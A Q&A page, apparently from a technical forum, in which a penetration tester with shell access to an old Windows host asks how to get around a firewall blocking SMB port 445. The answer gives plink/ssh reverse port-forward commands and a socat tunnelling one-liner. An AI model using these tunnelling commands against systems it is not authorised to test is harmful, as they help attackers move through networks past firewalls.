Windows – How to forward external port to internal port using plink

portssshwindows

For a penetration test where I have shell access to a computer running an old Windows, I'd like to forward port 4450 to 127.0.0.1:445 because the firewall is blocking 445 externally.

I'm stuck on the following:

plink -L 4450:127.0.0.1:445 SSH-Server

According to the documentation I've found, I'd have to specify a SSH-Server. But all documentation I've found just uses an SSH-Server in the same network. To forward it to a localhost port, that wouldn't help.

Do I have to install an SSH-Server on that machine or are there other ways?

Best Answer

If you have an ssh client on the Windows system, and you can establish SSH outbound to a system you control, then you can use a remote port forward, i.e. with option -R. This is effectively the opposite of -L, it sets up a listener on the remote (connected to) and forwards back [sic] through the system you're connecting from.

So, run ssh/putty/plink on the windows system with -R 4450:127.0.0.1:445 or equivalent, and log in to an sshd you control. You can then connect to 127.0.0.1:4450 on that system.

Depending on the nature of your "shell access", other options may include running socat or netcat across it, e.g.:

socat -ddd SYSTEM:"ssh somewhere 'socat TCP4-LISTEN:4450 STDIO'"  TCP:127.0.0.1:445

Note this gets you a single connection back only, you need socat on each side.

Related Question